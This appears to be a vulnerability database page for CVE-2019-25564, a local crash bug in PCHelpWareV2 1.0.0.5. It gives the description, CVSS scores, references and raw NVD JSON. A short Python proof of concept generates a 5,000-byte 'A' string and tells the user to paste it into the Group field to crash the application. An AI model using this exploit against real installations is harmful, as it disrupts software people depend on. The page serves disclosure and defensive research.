CVE-2019-25564

Description

PCHelpWareV2 1.0.0.5 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Group field. Attackers can paste a buffer overflow payload into the Group property field and click Ok to trigger an application crash.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:uvnc:pchelpwarev2:1.0.0.5:*:*:*:*:*:*:* - VULNERABLE

PCHelpWareV2 1.0.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Proof of Concept for CVE-2019-25564
# Generates a payload to crash PCHelpWareV2 via the 'Group' field buffer overflow.

def generate_payload(length=5000):
    """Generates a long string of 'A' characters to trigger the overflow."""
    return b'A' * length

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[+] Generated payload with length: {len(payload)}")
    print(f"[+] Payload snippet: {payload[:50]}...")
    print("[!] Instruction: Copy this payload and paste it into the 'Group' field of PCHelpWareV2, then click Ok.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25564
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25564
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25564/
[4] VulDB https://vuldb.com/cve/CVE-2019-25564
[5] http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
[6] https://www.exploit-db.com/exploits/46709
[7] https://www.uvnc.com/home.html
[8] https://www.vulncheck.com/advisories/pchelpwarev2-denial-of-service-via-group-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25564", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:19.710", "lastModified": "2026-03-24T20:43:35.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PCHelpWareV2 1.0.0.5 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Group field. Attackers can paste a buffer overflow payload into the Group property field and click Ok to trigger an application crash."}, {"lang": "es", "value": "PCHelpWareV2 1.0.0.5 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Grupo. Los atacantes pueden pegar una carga útil de desbordamiento de búfer en el campo de propiedad Grupo y hacer clic en Aceptar para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uvnc:pchelpwarev2:1.0.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "4F97DB90-1253-45B4-9289-32A035A87E24"}]}]}], "references": [{"url": "http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46709", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.uvnc.com/home.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/pchelpwarev2-denial-of-service-via-group-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}